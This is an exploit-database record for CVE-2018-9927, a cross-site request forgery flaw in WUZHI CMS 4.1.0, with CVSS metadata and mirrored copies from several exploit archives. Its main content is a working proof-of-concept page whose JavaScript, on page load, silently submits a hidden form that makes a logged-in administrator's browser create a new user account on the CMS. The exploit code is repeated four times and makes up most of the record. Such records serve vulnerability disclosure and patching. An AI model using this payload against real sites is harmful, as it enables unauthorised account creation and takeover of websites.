ID PACKETSTORM:147141
Type packetstorm
Reporter taoge
Modified 2018-04-11T00:00:00
Description
`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
`
{"id": "PACKETSTORM:147141", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery", "description": "", "published": "2018-04-11T00:00:00", "modified": "2018-04-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/147141/Wuzhi-CMS-4.1.0-Add-User-Cross-Site-Request-Forgery.html", "reporter": "taoge", "references": [], "cvelist": ["CVE-2018-9927"], "lastseen": "2018-04-12T01:03:53", "viewCount": 6, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2018-04-12T01:03:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-9927"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9020CC101457E38D768545DF8C15301E"]}, {"type": "exploitdb", "idList": ["EDB-ID:44440"]}], "modified": "2018-04-12T01:03:53", "rev": 2}, "vulnersScore": 5.6}, "sourceHref": "https://packetstormsecurity.com/files/download/147141/wuzhicms410adduser-xsrf.txt", "sourceData": "`# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account \n# Date: 2018-04-10 \n# Exploit Author: taoge \n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms \n# Software Link: https://github.com/wuzhicms/wuzhicms \n# Version: 4.1.0 \n# CVE : CVE-2018-9927 \n \nAn issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4 \nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add. \nAfter the administrator logged in, open the csrf exp page. \n \n \n<html><body> \n<script type=\"text/javascript\"> \nfunction post(url,fields) \n{ \nvar p = document.createElement(\"form\"); \np.action = url; \np.innerHTML = fields; \np.target = \"_self\"; \np.method = \"post\"; \ndocument.body.appendChild(p); \np.submit(); \n} \nfunction csrf_hack() \n{ \nvar fields; \n \n \nfields += \"<input type='hidden' name='info[username]' value='hack123' />\"; \nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='avatar' value='' />\"; \nfields += \"<input type='hidden' name='islock' value='0' />\"; \nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \n \n \nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\"; \npost(url,fields); \n} \nwindow.onload = function() { csrf_hack();} \n</script> \n</body></html> \n \n \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:52:44", "description": "An issue was discovered in WUZHI CMS 4.1.0. There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-10T06:29:00", "title": "CVE-2018-9927", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9927"], "modified": "2019-02-27T20:03:00", "cpe": ["cpe:/a:wuzhicms:wuzhicms:4.1.0"], "id": "CVE-2018-9927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9927", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2018-05-24T14:13:57", "description": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User). Webapps exploit for PHP platform", "published": "2018-04-10T00:00:00", "type": "exploitdb", "title": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9927"], "modified": "2018-04-10T00:00:00", "id": "EDB-ID:44440", "href": "https://www.exploit-db.com/exploits/44440/", "sourceData": "# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account\r\n# Date: 2018-04-10\r\n# Exploit Author: taoge\r\n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms\r\n# Software Link: https://github.com/wuzhicms/wuzhicms\r\n# Version: 4.1.0 \r\n# CVE : CVE-2018-9927\r\n \r\nAn issue was discovered in WUZHI CMS 4.1.0.\uff08https://github.com/wuzhicms/wuzhicms/issues/128\uff09\r\nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.\r\nAfter the administrator logged in, open the csrf exp page.\r\n \r\n \r\n<html><body>\r\n<script type=\"text/javascript\">\r\nfunction post(url,fields)\r\n{\r\nvar p = document.createElement(\"form\");\r\np.action = url;\r\np.innerHTML = fields;\r\np.target = \"_self\";\r\np.method = \"post\";\r\ndocument.body.appendChild(p);\r\np.submit();\r\n}\r\nfunction csrf_hack()\r\n{\r\nvar fields;\r\n\r\n\r\nfields += \"<input type='hidden' name='info[username]' value='hack123' />\";\r\nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \r\nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \r\nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \r\nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \r\nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \r\nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \r\nfields += \"<input type='hidden' name='avatar' value='' />\"; \r\nfields += \"<input type='hidden' name='islock' value='0' />\"; \r\nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \r\nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \r\nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \r\nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \r\nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \r\n\r\n\r\nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\";\r\npost(url,fields);\r\n}\r\nwindow.onload = function() { csrf_hack();}\r\n</script>\r\n</body></html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44440/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:54", "description": "\nWUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "edition": 1, "published": "2018-04-10T00:00:00", "title": "WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9927"], "modified": "2018-04-10T00:00:00", "id": "EXPLOITPACK:9020CC101457E38D768545DF8C15301E", "href": "", "sourceData": "# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account\n# Date: 2018-04-10\n# Exploit Author: taoge\n# Vendor Homepage: https://github.com/wuzhicms/wuzhicms\n# Software Link: https://github.com/wuzhicms/wuzhicms\n# Version: 4.1.0 \n# CVE : CVE-2018-9927\n \nAn issue was discovered in WUZHI CMS 4.1.0.\uff08https://github.com/wuzhicms/wuzhicms/issues/128\uff09\nThere is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.\nAfter the administrator logged in, open the csrf exp page.\n \n \n<html><body>\n<script type=\"text/javascript\">\nfunction post(url,fields)\n{\nvar p = document.createElement(\"form\");\np.action = url;\np.innerHTML = fields;\np.target = \"_self\";\np.method = \"post\";\ndocument.body.appendChild(p);\np.submit();\n}\nfunction csrf_hack()\n{\nvar fields;\n\n\nfields += \"<input type='hidden' name='info[username]' value='hack123' />\";\nfields += \"<input type='hidden' name='info[password]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[pwdconfirm]' value='hacktest' />\"; \nfields += \"<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />\"; \nfields += \"<input type='hidden' name='info[mobile]' value='' />\"; \nfields += \"<input type='hidden' name='modelids[]' value='10' />\"; \nfields += \"<input type='hidden' name='info[groupid]' value='3' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='pids[]' value='0' />\"; \nfields += \"<input type='hidden' name='avatar' value='' />\"; \nfields += \"<input type='hidden' name='islock' value='0' />\"; \nfields += \"<input type='hidden' name='sys_name' value='0' />\"; \nfields += \"<input type='hidden' name='info[birthday]' value='' />\"; \nfields += \"<input type='hidden' name='info[truename]' value='' />\"; \nfields += \"<input type='hidden' name='info[sex]' value='0' />\"; \nfields += \"<input type='hidden' name='info[marriage]' value='0' />\"; \n\n\nvar url = \"http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge\";\npost(url,fields);\n}\nwindow.onload = function() { csrf_hack();}\n</script>\n</body></html>", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
